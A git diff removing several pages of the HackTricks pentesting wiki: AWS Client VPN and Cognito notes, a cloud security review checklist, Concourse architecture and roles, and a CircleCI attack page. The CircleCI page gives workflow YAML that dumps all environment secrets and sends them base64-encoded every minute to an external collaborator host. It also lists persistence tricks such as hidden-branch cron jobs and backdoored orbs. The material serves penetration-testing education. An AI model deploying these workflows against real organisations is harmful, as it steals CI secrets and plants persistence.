-* The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. -* You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. -* A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. -* Client VPN supports **IPv4** traffic only. -* Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. -* If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. - - ``` - SCRV1:: - ``` -* The self-service portal is **not available for clients that authenticate using mutual authentication**. - -# Amazon Cognito - -Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple. - -The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together. - -## **User pools** - -A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. - -User pools provide: - -* Sign-up and sign-in services. -* A built-in, customizable web UI to sign in users. -* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. -* User directory management and user profiles. 
-* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. -* Customized workflows and user migration through AWS Lambda triggers. - -## **Identity pools** - -With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools: - -* Amazon Cognito user pools -* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple -* OpenID Connect (OIDC) providers -* SAML identity providers -* Developer authenticated identities - -To save user profile information, your identity pool needs to be integrated with a user pool. - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/circleci.md b/cloud-security/circleci.md deleted file mode 100644 index d26f49b75..000000000 --- a/cloud-security/circleci.md +++ /dev/null @@ -1,291 +0,0 @@ -# CircleCI - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Basic Information - -[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. - -## Permissions - -**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\ -In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...). - -However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**. - -## Env Variables & Secrets - -According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow. - -### Built-in env variables - -Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. 
- -### Clear text - -You can declare them in clear text inside a **command**: - -```yaml -- run: - name: "set and echo" - command: | - SECRET="A secret" - echo $SECRET -``` - -You can declare them in clear text inside the **run environment**: - -```yaml -- run: - name: "set and echo" - command: echo $SECRET - environment: - SECRET: A secret -``` - -You can declare them in clear text inside the **build-job environment**: - -```yaml -jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret -``` - -You can declare them in clear text inside the **environment of a container**: - -```yaml -jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret -``` - -### Project Secrets - -These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ -You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ - -![](<../.gitbook/assets/image (662) (1) (1).png>) - -{% hint style="danger" %} -The "**Import Variables**" functionality allows to **import variables from other projects** to this one. -{% endhint %} - -### Context Secrets - -These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: - -![](<../.gitbook/assets/image (661).png>) - -{% hint style="success" %} -However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ -This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. -{% endhint %} - -## Attacks - -### Search Clear Text Secrets - -If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there. 
- -### Secret Env Vars & Context enumeration - -Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. - -### Exfiltrate Project secrets - -{% hint style="warning" %} -In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). -{% endhint %} - -{% hint style="danger" %} -The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. -{% endhint %} - -All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: - -```yaml -version: 2.1 - -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" - -workflows: - exfil-env-workflow: - jobs: - - exfil-env -``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - -```yaml -version: 2.1 - -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" - -# I filter by the repo branch where this config.yaml file is located: circleci-project-setup -workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* 
* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env -``` - -### Exfiltrate Context Secrets - -You need to **specify the context name** (this will also exfiltrate the project secrets): - -```yaml -``` - -```yaml -version: 2.1 - -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" - -workflows: - exfil-env-workflow: - jobs: - - exfil-env: - context: Test-Context -``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - -```yaml -version: 2.1 - -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" - -# I filter by the repo branch where this config.yaml file is located: circleci-project-setup -workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env: - context: Test-Context -``` - -{% hint style="warning" %} -Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. -{% endhint %} - -### Escape to Cloud - -**CircleCI** gives you the option to run **your builds in their machines or in your own**.\ -By default their machines are located in GCP, and you initially won't be able to find anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**. 
- -Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions): - -```yaml -jobs: - exfil-env: - #docker: - # - image: cimg/base:stable - machine: - image: ubuntu-2004:current -``` - -Or even a docker container with access to a remote docker service: - -```yaml -jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - setup_remote_docker: - version: 19.03.13 -``` - -### Persistence - -* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. - * _https://app.circleci.com/settings/user/tokens_ -* It's possible to **create projects tokens** to access the project with the permissions given to the token. - * _https://app.circleci.com/settings/project/github/\/\/api_ -* It's possible to **add SSH keys** to the projects. - * _https://app.circleci.com/settings/project/github/\/\/ssh_ -* It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. - * Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. -* If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** -* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/cloud-security-review.md b/cloud-security/cloud-security-review.md deleted file mode 100644 index 691e26fdf..000000000 --- a/cloud-security/cloud-security-review.md +++ /dev/null @@ -1,149 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -**Check for nice cloud hacking tricks in** [**https://hackingthe.cloud**](https://hackingthe.cloud) - -# Generic tools - -There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section. - -## [ScoutSuite](https://github.com/nccgroup/ScoutSuite) - -AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure - -``` -pip3 install scoutsuite -``` - -## [cs-suite](https://github.com/SecurityFTW/cs-suite) - -AWS, GCP, Azure, DigitalOcean - -``` -git clone https://github.com/SecurityFTW/cs-suite.git && cd cs-suite/ -pip install virtualenv -virtualenv -p python2.7 venv -source venv/bin/activate -pip install -r requirements.txt -python cs.py --help -``` - -## Nessus - -Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**. - -## Common Sense - -Take a look to the **network access rules** and detect if the services are correctly protected: - -* ssh available from everywhere? -* Unencrypted services running (telnet, http, ...)? -* Unprotected admin consoles? -* In general, check that all services are correctly protected depending on their needs - -# Azure - -Access the portal here: [http://portal.azure.com/](http://portal.azure.com)\ -To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. 
- -It is recommended to **install azure-cli** in a **linux** and **windows** virtual machines (to be able to run powershell and python scripts): [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest)\ -Then, run `az login` to login. Note the **account information** and **token** will be **saved** inside _\/.azure_ (in both Windows and Linux). - -Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22)).\ -\_\_If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw\_wcB#microsoft-azure). - -## Run scanners - -Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**. 
- -```bash -pip install scout -scout azure --cli --report-dir - -#Fix azureaudit.py before launching cs.py -#Adding "j_res = {}" on line 1074 -python cs.py -env azure - -#Azucar is an Azure security scanner for PowerShell (https://github.com/nccgroup/azucar) -#Run it from its folder -.\Azucar.ps1 -AuthMode Interactive -ForceAuth -ExportTo EXCEL - -#Azure-CIS-Scanner,CIS scanner for Azure (https://github.com/kbroughton/azure_cis_scanner) -pip3 install azure-cis-scanner #Install -azscan #Run, login before with `az login` -``` - -## Attack Graph - -[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an β€œattack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work. - -## More checks - -* Check for a **high number of Global Admin** (between 2-4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview) -* Global admins should have MFA activated. Go to Users and click on Multi-Factor Authentication button. - -![](<../.gitbook/assets/image (293).png>) - -* Dedicated admin account shouldn't have mailboxes (they can only have mailboxes if they have Office 365). -* Local AD shouldn't be sync with Azure AD if not needed([https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect)). And if synced Password Hash Sync should be enabled for reliability. In this case it's disabled: - -![](<../.gitbook/assets/image (294).png>) - -* **Global Administrators** shouldn't be synced from a local AD. Check if Global Administrators emails uses the domain **onmicrosoft.com**. 
If not, check the source of the user, the source should be Azure Active Directory, if it comes from Windows Server AD, then report it. - -![](<../.gitbook/assets/image (295).png>) - -* **Standard tier** is recommended instead of free tier (see the tier being used in _Pricing & Settings_ or in [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24)) -* **Periodic SQL servers scans**: - - _Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_ -* **Lack of App Services restrictions**: Look for "App Services" in Azure ([https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)) and check if any is being used. In that case, go through each App checking for "Access Restrictions"; if there aren't rules, report it. The access to the app service should be restricted according to the needs. - -# Office365 - -You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features via the web application. - -# AWS - -Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx) - -# GCP - -{% content-ref url="gcp-security/" %} -[gcp-security](gcp-security/) -{% endcontent-ref %} - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/concourse/README.md b/cloud-security/concourse/README.md deleted file mode 100644 index 2745687e4..000000000 --- a/cloud-security/concourse/README.md +++ /dev/null @@ -1,67 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -**Concourse allows you to build pipelines to automatically run tests, actions and build images whenever you need it (time based, when something happens...)** - -# Concourse Architecture - -Learn how the concourse environment is structured in: - -{% content-ref url="concourse-architecture.md" %} -[concourse-architecture.md](concourse-architecture.md) -{% endcontent-ref %} - -# Run Concourse Locally - -Learn how you can run a concourse environment locally to do your own tests in: - -{% content-ref url="concourse-lab-creation.md" %} -[concourse-lab-creation.md](concourse-lab-creation.md) -{% endcontent-ref %} - -# Enumerate & Attack Concourse - -Learn how you can enumerate the concourse environment and abuse it in: - -{% content-ref url="concourse-enumeration-and-attacks.md" %} -[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md) -{% endcontent-ref %} - -# References - -* [https://concourse-ci.org/internals.html#architecture-worker](https://concourse-ci.org/internals.html#architecture-worker) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/concourse/concourse-architecture.md b/cloud-security/concourse/concourse-architecture.md deleted file mode 100644 index 09f585ac4..000000000 --- a/cloud-security/concourse/concourse-architecture.md +++ /dev/null @@ -1,52 +0,0 @@ -# Concourse Architecture - -## Concourse Architecture - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Architecture - -![](<../../.gitbook/assets/image (307) (3) (1).png>) - -### ATC: web UI & build scheduler - -The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). - -The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously check for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. - -### TSA: worker registration & forwarding - -The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). - -The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. - -The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). - -### Workers - -In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). - -* **Garden**: This is the **Container Management API**, usually run in **port 7777** via **HTTP**. -* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/concourse/concourse-enumeration-and-attacks.md b/cloud-security/concourse/concourse-enumeration-and-attacks.md deleted file mode 100644 index 52d1baa21..000000000 --- a/cloud-security/concourse/concourse-enumeration-and-attacks.md +++ /dev/null @@ -1,466 +0,0 @@ -# Concourse Enumeration & Attacks - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## User Roles & Permissions - -Concourse comes with five roles: - -* _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. -* **owner**: Team owners can **modify everything within the team**. -* **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. -* **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. -* **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. - -{% hint style="info" %} -Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically its actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) -{% endhint %} - -Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. - -## Vars & Credential Manager - -In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\ -The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\ -The optional _**secret-field**_ specifies a field on the fetched secret to read. 
If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\ -Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`. - -### Static Vars - -Static vars can be specified in **tasks steps**: - -```yaml - - task: unit-1.13 - file: booklit/ci/unit.yml - vars: {tag: 1.13} -``` - -Or using the following `fly` **arguments**: - -* `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. -* `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. -* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. -* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. 
